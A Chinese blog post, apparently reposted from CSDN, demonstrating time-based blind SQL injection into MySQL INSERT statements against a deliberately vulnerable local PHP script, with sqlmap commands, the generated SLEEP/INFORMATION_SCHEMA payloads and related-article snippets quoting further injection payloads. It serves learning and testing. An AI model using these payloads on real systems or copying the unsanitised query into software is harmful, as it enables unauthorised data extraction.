mysql注入执行insert_mysql insert延时注入 | CN-SEC 中文网

最新推荐文章于 2024-06-18 10:53:33 发布
最新推荐文章于 2024-06-18 10:53:33 发布
阅读量300 收藏
点赞数
文章标签: mysql注入执行insert
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_33892912/article/details/113614790
版权

摘要

首先建个数据库和一张表:

create database blog;

create table admin(id int primary key auto_increment,email varchar(500));

写个insert.php方便sqlmap跑:

$conn=mysql _connect(“localhost”,”root “,”yourpass”);

mysql_select_db(“admin”,$conn);

if(isset($_GET[“email”])){

$email=$_GET[’email’];

mysql _query(“insert into admin(email) values(‘$emal’)”);

}

?>

用seay的mysql监控来监控数据库执行的语句,这样比抓包要方便一些。

sqlmap -u http://127.0.0.1/[email protected]

测试出延时注入,payload是[email protected]’ and sleep(5) and ‘ufwy’=’ufwy

那么对应的数据库执行语句就应该为:

insert into admin(email) values(‘[email protected]’ and sleep(5) and ‘ufwy’=’ufwy’);

在mysql监控里查看下它是怎么跑–dbs的:

insert into admin(email)values(‘[email protected]’ AND 4830=IF((ORD(MID((SELECT IFNULL(CAST(COUNT(DISTINCT(schema_name)) AS CHAR),0x20) FROM INFORMATION_SCHEMA.SCHEMATA),1,1)) > 51),SLEEP(5),4830) AND ‘XDSc’=’XDSc’)

insert into admin(email)values(‘[email protected]’ AND 6499=IF((ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 0,1),1,1)) > 64),SLEEP(2),6499) AND ‘ngXr’=’ngX r’)

-D blog –tables

insert into admin(email)values(‘[email protected]’ AND 3039=IF((ORD(MID((SELECT IFNULL(CAST(table_name AS CHAR),0x20) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x626c6f67 LIMIT 1,1),7,1)) > 112),SLEEP(6),3039) AND ‘sAEl’=’sAEl’)

-D blog -T admin –dump

果没有跑出来,延时注入的局限性太大了,当然也有insert报错注入 的情况,只是不适合上面这种情况。

总之insert into延时注入的核心就是:

insert into blog(email) values(‘[email protected]’ and if(true,sleep(5),0);

含元东
关注
mysql insert 注入_SQLMap Insert注入踩坑记
weixin_39773239的博客
02-01 1142
*本文原创作者:Conan,本文属 FreeBuf 原创奖励计划,未经许可禁止转载前言本篇文章是在做ctf bugku的一道sql insert盲注的题(题目地址:insert盲注)中踩到的坑,觉得还挺有趣的,于是便有了今天的文章,如有纰漏还望大佬们多多指正。进入主题1. 判断注入点明显的insert类型的注入注入点在X-Forwarded-For,但关闭了错误提示并且没有回显,因此只能进行时间...
mysql insert慢排查_MySQL简单INSERT超慢原因排查
weixin_39525355的博客
01-26 450
导 读https://www.jianshu.com/p/5248ca67eac2这个问题是来自一位朋友@春波,我通过pstack最终确认问题,涉及到两个参数的设置,我将从源码进行解释,如果有误还请见谅。一、问题展示1、简单插入需要1秒语句截图如下:耗时截图如下: 2、profile展示: 实际上这里的query end是一个非常有用的信息,基本确认是在order_commit函数上的等待。二、问...
mysql时间 注入 sleep_SQL注入进阶
weixin_29442195的博客
01-28 1107
原标题:SQL注入进阶 1、时间注入攻击时间注入攻击的测试地址:http://ccctf.cn/sql/time/time.php?id=1。访问该网址时,页面返回yes,在网址的后面加上一个单引号,再次访问,页面返回no。这个结果与Boolean注入非常相似,下面介绍遇到这种情况时的另外一种注入方法——时间盲注。它与Boolean注入的不同之处在于,时间注入是利用sleep或benchmark等...
Web安全基础学习:SQL注入漏洞之Mysql注入
最新发布
qq_51862722的博客
06-18 968
SQL注入(SQL Injection)是一种常见的Web安全漏洞,形成的主要原因是web应用程序在接收相关数据参数时未做好过滤,将其直接带入到数据库中查询,导致攻击者可以拼接执行构造的SQL语句。
MySQL注入总结
dteer的博客
04-02 443
目录:0x00 mysql一般注入(select)0x01 mysql一般注入(insert、update)0x02 mysql报错注入0x03 mysql一般盲注0x04 mysql时间盲注0x05 mysql其他注入技巧0x06 mysql数据库版本特性0x07 声明正文:0x00 mysql一般注入(select)1.注释符#/*--2.过滤空格注入使用/**/或()或+代替空格%0c = ...
mysql delayed_MYSQL INSERT DELAYED
weixin_31999597的博客
01-19 597
INSERT DELAYED 语法DELAYED选项是标准的MYSQL扩展。如果你不需要等待INSERT语句的完成,就立刻返回,那么 INSERT DELAYED非常适合。通常情况下:使用MYSQL记录日志,但是在这个过程中又有SELECT或者UPDATE语句花费非常长的时间。当使用INSERT DELAYED的时候,客户端会立刻收到ok的反馈,被插入的行会进行排队,然后的等待table没有别的进...
mysql的插入insert into
u011649691的博客
05-28 6998
1、普通插入:insert into 当插入数据时,例如: INSERT INTO books (name) VALUES (‘MySQL Manual’) 2、忽略重复插入:insert ignore into 当插入数据时,如出现错误时,如重复数据,将不返回错误,只以警告形式返回。所以使用ignore请确保语句本身没有问题,否则也会被忽略掉。例如: INSERT IGNORE IN...
mysql insert 注入_MysqlInsert、Update、Delete、Order By、Group By注入
weixin_42376118的博客
01-19 242
Insert:语法:INSERT INTO table_name (列1, 列2,...) VALUES (值1, 值2,....)报错注入insert into test(id,name,pass) values (6,'xiaozi' or updatexml(1,concat(0x7e,(database()),0x7e),0) or '', 'Nervo');insert into te...
mysql同城半同步延时_mysql 半同步延时
weixin_27964579的博客
02-07 369
半同步搭建所谓的半同步复制就是master每commit一个事务,要slave应用这个事物后回给master信号。这样master才能把事物成功commit。这样就保证了master-slave的数据绝对的一致(但是以牺牲master的性能为代价).但等待时间也是可以调整的。 mysql半同步复制等待时间超时后(默认时间为10秒),会自动转换成异步复制 ,相对于异步复制,半同步复制提高了数据的安全...
mysql的server_id怎么设置_MySQL Server-id踩到的坑
weixin_39603908的博客
01-18 2848
最近踩到一个说大不大,说小不小的坑,在此分享出来给各位同学。事情是这样的,线上有2台服务器,1主1从。A -> B,B服务器从A服务器同步数据。每天使用xtrabackup在B服务器上面进行全备。某天A服务器挂了,后来由于某种原因无法进入系统了,只有重装了系统,那么此时要恢复A服务器的步骤就是在A服务器部署mysql实例,从B服务器上面拿备份恢复到A,再根据POS点change到B服务器,让...
mysql数据库relay_完美起航-MySQL案例实战--MySQL数据库主从复制--高级进阶功能
weixin_35538148的博客
02-08 199
前言本环境是基于 Centos 7.8 系统构建MySQL-5.7.14具体构建,请参考 MySQL-5.7.14 环境构建一、延时同步功能介绍是我们人为配置的一种特殊从库.人为配置从库和主库延时N小时.为什么要有延时从:解决数据库故障的问题物理损坏: 主从复制非常擅长解决物理损坏,比如主库rm 删除数据库数据,直接将应用切换到从库.逻辑损坏:普通主从复制没办法解决逻辑损坏,比如主库 drop d...
插入式注入方法技巧
07-24
插入式注入方法技巧,可以学习一下啊,比较全面了
mysql主从复制sql_delay_十三、MySQL主从复制、延时从库、半同步复制、过滤复制、基于GTID的主从复制...
weixin_39897218的博客
02-02 177
一、mysql主从复制1.主从复制主库的操作1.主库配置server_id2.主库开启binlog3.授权主从用户4.主库查看binlog信息2.主从复制从库的操作1.配置server_id,与主库不同2.先同步主库数据3.配置主从change master tomaster_host=172.16.1.51,master_user=rep,master_password=123,master_p...
Mysqlinsert into
SYSZ520的博客
03-23 459
INSERT INTO 插入语句的使用 第一种形式无需指定要插入数据的列名,只需提供被插入的值即可: INSERT INTO table_name VALUES (value1,value2,value3,…); eg: INSERT INTO Student VALUES ('03','孙风','1990-05-20','男'); 第二种形式需要指定列名及被插入的值: INSERT INTO table_name (column1,column2,column3,…) VALUES (value1,v
mysql insert 注入_mysql,insert登陆框注入思路,(未完)
weixin_33444829的博客
01-19 337
admin','111 or 1=1',1376194991,0,'218.121.111.35',concat(@@version))#concat((select (select (update manager_login set userPasswd = 111111 where userName = admin)) from information_schema.tables limit ...
mysql insert sql注入_SQL注入-双注入的学习
weixin_42128270的博客
02-07 492
0x1 需要用到的MySQL函数count():用来统计表中或数组中记录的一个函数 count(*)某表中所有的列floor():返回小于等于该值的最大整数【向下取整】rand(): 产生随机数0x2原理分析接下来我们再分析其报错的形成 原因:先谈group by 函数:在表中再插入两条数据,name值都为“bbb”:mysql> INSERT INTO test VALUES("3","b...
mysql注入执行insert_利用insert,update和delete注入获取数据_MySQL - insert
weixin_39646725的博客
01-28 191
.../code>)) ENGINE=MyISAM AUTO_INCREMENT=25 DEFAULT CHARSET=utf8INSERT INTO test VALUES (1, '2015-7-1', 'test_1');INSERT INTO test VALUES (2, '2015-7-1', 'test_2');INSERT INTO test VALUES (3, '2015...
mysql insert 注入_Insert和Update型SQL注入的实践之旅
weixin_35696092的博客
01-19 259
1.有回显注入int型注入点和字符型都采用按位或|和按位异或^获取数据。如果拼接的值为0,可以采用按位或|运算显示查询到的数据,如果拼接的值不是0(以100为例),可以采用按位异或^运算显示运算后的数据,然后再异或一次可以恢复查询的数据。注意查询到的数据经过hex转换,如果值大于Mysql bigint 最大值9223372036854775807时,获取到的数据均为922337203685477...
MySQL 及 SQL 注入
jia_1418422386的博客
05-21 651
①如果您通过网页获取用户输入的数据并将其插入一个MySQL数据库,那么就有可能发生SQL注入安全的问题。②所谓SQL注入,就是通过把SQL命令插入到Web表单递交或输入域名或页面请求,最终恶意捣乱。③在用户的输入,我们必须认定用户输入的数据都是不安全的,我们都需要对用户输入的数据进行过滤处理。以下实例中,输入的用户名必须为字母、数字及下划线的组合,且用户名长度为 8 到 20 个字符之间:  如下...
MySQL SQL注入:information_schema数据库的利用与解析
"本文深入探讨了information_schema数据库在SQL注入攻击中的应用,特别是在MySQL环境下的重要性。这个系统数据库包含了MySQL服务器内所有数据库、表和列的详细信息,为攻击者提供了一个宝贵的工具来获取和利用数据库...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值